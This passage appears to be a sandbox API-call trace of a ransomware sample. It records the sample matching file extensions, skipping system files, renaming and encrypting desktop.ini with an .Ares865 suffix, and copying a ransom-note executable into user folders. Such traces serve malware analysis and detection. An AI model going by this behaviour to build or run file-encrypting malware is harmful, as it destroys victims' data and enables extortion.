(lpString1="ini", lpString2="mdn") returned -1 [0060.096] lstrlenW (lpString="mdt") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0060.096] lstrlenW (lpString="mfd") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0060.096] lstrlenW (lpString="mpd") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0060.096] lstrlenW (lpString="mrg") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0060.096] lstrlenW (lpString="mud") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0060.096] lstrlenW (lpString="mwb") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0060.096] lstrlenW (lpString="myd") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0060.096] lstrlenW (lpString="ndf") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0060.096] lstrlenW (lpString="nnt") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0060.096] lstrlenW (lpString="nrmlib") returned 6 [0060.096] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0060.097] lstrlenW (lpString="ns2") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0060.097] lstrlenW (lpString="ns3") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0060.097] lstrlenW (lpString="ns4") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0060.097] lstrlenW (lpString="nsf") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0060.097] lstrlenW (lpString="nv") returned 2 [0060.097] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0060.097] lstrlenW (lpString="nv2") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0060.097] lstrlenW (lpString="nwdb") returned 4 [0060.097] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0060.097] lstrlenW (lpString="nyf") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0060.097] lstrlenW (lpString="odb") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.097] lstrlenW (lpString="odb") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.097] lstrlenW (lpString="oqy") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0060.097] lstrlenW (lpString="ora") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0060.097] lstrlenW (lpString="orx") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0060.097] lstrlenW (lpString="owc") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0060.097] lstrlenW (lpString="p96") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0060.097] lstrlenW (lpString="p97") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0060.097] lstrlenW (lpString="pan") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0060.097] lstrlenW (lpString="pdb") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0060.097] lstrlenW (lpString="pdm") returned 3 [0060.097] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0060.097] lstrlenW (lpString="pnz") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0060.098] lstrlenW (lpString="qry") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0060.098] lstrlenW (lpString="qvd") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0060.098] lstrlenW (lpString="rbf") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0060.098] lstrlenW (lpString="rctd") returned 4 [0060.098] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0060.098] lstrlenW (lpString="rod") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0060.098] lstrlenW (lpString="rodx") returned 4 [0060.098] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0060.098] lstrlenW (lpString="rpd") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0060.098] lstrlenW (lpString="rsd") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0060.098] lstrlenW (lpString="sas7bdat") returned 8 [0060.098] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0060.098] lstrlenW (lpString="sbf") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0060.098] lstrlenW (lpString="scx") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0060.098] lstrlenW (lpString="sdb") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0060.098] lstrlenW (lpString="sdc") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0060.098] lstrlenW (lpString="sdf") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0060.098] lstrlenW (lpString="sis") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0060.098] lstrlenW (lpString="spq") returned 3 [0060.098] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0060.098] lstrlenW (lpString="te") returned 2 [0060.098] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0060.098] lstrlenW (lpString="teacher") returned 7 [0060.098] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0060.098] lstrlenW (lpString="tmd") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0060.099] lstrlenW (lpString="tps") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0060.099] lstrlenW (lpString="trc") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.099] lstrlenW (lpString="trc") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.099] lstrlenW (lpString="trm") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0060.099] lstrlenW (lpString="udb") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0060.099] lstrlenW (lpString="udl") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0060.099] lstrlenW (lpString="usr") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0060.099] lstrlenW (lpString="v12") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0060.099] lstrlenW (lpString="vis") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0060.099] lstrlenW (lpString="vpd") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0060.099] lstrlenW (lpString="vvv") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0060.099] lstrlenW (lpString="wdb") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0060.099] lstrlenW (lpString="wmdb") returned 4 [0060.099] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0060.099] lstrlenW (lpString="wrk") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0060.099] lstrlenW (lpString="xdb") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0060.099] lstrlenW (lpString="xld") returned 3 [0060.099] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0060.099] lstrlenW (lpString="xmlff") returned 5 [0060.099] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0060.099] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\My Documents\\desktop.ini.Ares865") returned 54 [0060.099] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\My Documents\\desktop.ini" (normalized: "c:\\users\\default user\\my documents\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\My Documents\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\my documents\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0060.100] CreateFileW (lpFileName="C:\\Users\\Default User\\My Documents\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\my documents\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.101] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=402) returned 1 [0060.101] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0060.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.102] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.102] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.102] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.103] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a0, lpName=0x0) returned 0x164 [0060.104] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a0) returned 0x190000 [0060.105] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.106] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.106] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.106] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.106] CloseHandle (hObject=0x164) returned 1 [0060.106] CloseHandle (hObject=0x15c) returned 1 [0060.108] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0060.108] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.108] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.108] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49eeef60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.108] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.108] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="aoldtz.exe") returned 1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="bootmgr") returned 1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="temp") returned -1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="pagefile.sys") returned -1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="boot") returned 1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="ids.txt") returned 1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="ntuser.dat") returned -1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="perflogs") returned -1 [0060.108] lstrcmpiW (lpString1="My Music", lpString2="MSBuild") returned 1 [0060.108] lstrlenW (lpString="My Music") returned 8 [0060.108] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\desktop.ini") returned 46 [0060.108] lstrcpyW (in: lpString1=0x2cce446, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0060.108] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0060.108] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x2df710 [0060.108] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7b70 [0060.108] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="aoldtz.exe") returned 1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="bootmgr") returned 1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="temp") returned -1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="pagefile.sys") returned -1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="boot") returned 1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="ids.txt") returned 1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="ntuser.dat") returned -1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="perflogs") returned -1 [0060.109] lstrcmpiW (lpString1="My Pictures", lpString2="MSBuild") returned 1 [0060.109] lstrlenW (lpString="My Pictures") returned 11 [0060.109] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Music") returned 43 [0060.109] lstrcpyW (in: lpString1=0x2cce446, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0060.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0060.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f2098 [0060.109] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7b90 [0060.109] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="aoldtz.exe") returned 1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="bootmgr") returned 1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="temp") returned -1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="pagefile.sys") returned -1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="boot") returned 1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="ids.txt") returned 1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="ntuser.dat") returned -1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="perflogs") returned -1 [0060.109] lstrcmpiW (lpString1="My Videos", lpString2="MSBuild") returned 1 [0060.109] lstrlenW (lpString="My Videos") returned 9 [0060.109] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Pictures") returned 46 [0060.109] lstrcpyW (in: lpString1=0x2cce446, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0060.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0060.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5a) returned 0x2f2100 [0060.110] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7cb0 [0060.110] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0060.110] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0060.110] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0060.110] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\My Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\My Documents\\My Videos") returned="C:\\Users\\Default User\\My Documents\\My Videos" [0060.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2100 | out: hHeap=0x2b0000) returned 1 [0060.110] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0060.110] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Videos") returned 44 [0060.110] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\My Documents\\My Videos" | out: lpString1="C:\\Users\\Default User\\My Documents\\My Videos") returned="C:\\Users\\Default User\\My Documents\\My Videos" [0060.110] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.110] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\My Documents\\My Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\my documents\\my videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.111] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.111] GetLastError () returned 0x0 [0060.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.111] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.111] CloseHandle (hObject=0x12c) returned 1 [0060.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.111] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.111] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\My Documents\\My Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x54118a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54118a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0060.112] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.112] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.112] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.112] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x54118a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54118a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.112] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.112] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.112] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.112] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.112] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x54118a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0060.112] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0060.112] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0060.112] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Videos\\*") returned 46 [0060.112] lstrcpyW (in: lpString1=0x2cce45a, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0060.112] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0060.112] lstrlenW (lpString="Ares865") returned 7 [0060.112] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0060.112] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b82fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.112] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.112] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b82fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", 